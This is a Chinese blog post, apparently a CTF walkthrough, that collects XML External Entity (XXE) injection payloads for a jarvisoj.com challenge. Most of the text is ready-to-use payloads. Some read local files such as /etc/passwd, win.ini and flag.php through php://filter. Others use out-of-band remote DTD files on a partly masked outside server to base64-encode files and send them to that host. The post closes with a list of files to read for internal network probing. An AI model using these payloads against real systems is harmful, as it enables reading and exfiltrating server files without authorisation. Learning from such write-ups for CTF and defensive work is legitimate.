美文网首页
XXE漏洞检测

XXE漏洞检测

作者: migrate_ | 来源:发表于2020-05-12 14:42 被阅读0次
http://web.jarvisoj.com:9882/
#实例演示一道CTF题目
#目的是获取/home/ctf/flag.txt的内容
  • 经过多番测试确定存在xxe漏洞
要先修改Content-Type: application/xml
然后加入xml脚本即可
<!DOCTYPE foo [<!ENTITY test  SYSTEM "file:///etc/passwd" >]><foo>&test;</foo>
jianshu1.jpg
  • 这里给出多个测试语句
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe1 [<!ELEMENT name ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>
<!DOCTYPE foo [<!ENTITY test  SYSTEM "file:///etc/passwd" >]><foo>&test;</foo>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe "66666666666666666666">]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>      #ctf读取文件
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>
  • 引用远程服务器的dtd文件(burp数据包)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY  % xxe SYSTEM "http://120.xx.xx.xx/webshella1231b/b.dtd" >
%xxe;]>
<foo>&b;</foo>
  • dtd文件内容(linux)
<!ENTITY b SYSTEM "file:///etc/passwd">
  • payload3.dtd(linux)
#burp发送的数据包
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://120.27.xx.xx/webshella1231b/payload3.dtd">
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>&xxe;</description>
   </core>
</catalog>
#dtd文件内容
<!ENTITY % file SYSTEM php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % all "<!ENTITY xxe SYSTEM 'http://120.27.xx.xx/webshella1231b/?%file;'>">
%all;
  • payload2(win)
发送的burp数据包
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://120.27.xx.xx/webshella1231b/payload2.dtd">
%remote;%int;%send;
]>
#dtd文件内容
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/phpStudy/WWW/robots.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://120.27.xx.xx/webshella1231b/?%file;'>">
  • HTTP 内网主机探测
尝试读取 
/etc/network/interfaces 
/proc/net/arp 
/etc/host 文件

相关文章

  • XXE漏洞检测

    经过多番测试确定存在xxe漏洞 这里给出多个测试语句 引用远程服务器的dtd文件(burp数据包) dtd文件内容...

  • XXE后记(3)--抛砖引玉

    XXE最后的尾巴 知道了XXE的漏洞原理,以及简单的利用方法,漏洞危害后;就应该通过案例来感受XXE造成的危害,引...

  • 00.web

    1. XXE[1] XXE (XML External Entity Injection) 漏洞实践 如何挖掘Ub...

  • XXE漏洞

    原文链接:http://wyb0.com/posts/xxe/ 0x00 XXE XXE漏洞是针对使用XML交互的...

  • XXE漏洞

    0x01 XXE基础-XML基础语法 XML被设计用来传输和存储数据。 HTML被设计用来显示数据。 0x02 什...

  • XXE漏洞

    XML简介 本节内容结合了《Web hacking 101》,链接在本文末尾,此书不错,基于hackerone上的...

  • java xxe漏洞

    一、XXE漏洞简介 1、XXE(XML外部实体注入,XML External Entity) ,在应用程序解析XM...

  • JAVA的XXE漏洞

    1. XXE简介 XXE(XML外部实体注入,XML External Entity) ,漏洞在对不安全的外部实体...

  • XXE CTF题目

    api调用 1、链接:jarvisoj 2、解题方法:xxe漏洞读取文件。payload: Pikachu漏洞联系...

  • 拒绝XML XXE,宅男不能言听计从

    漏洞信息来源 XXE in WeChat Pay Sdk ( WeChat leave a backdoor on...

网友评论

      本文标题:XXE漏洞检测

      本文链接:https://www.haomeiwen.com/subject/cvyvnhtx.html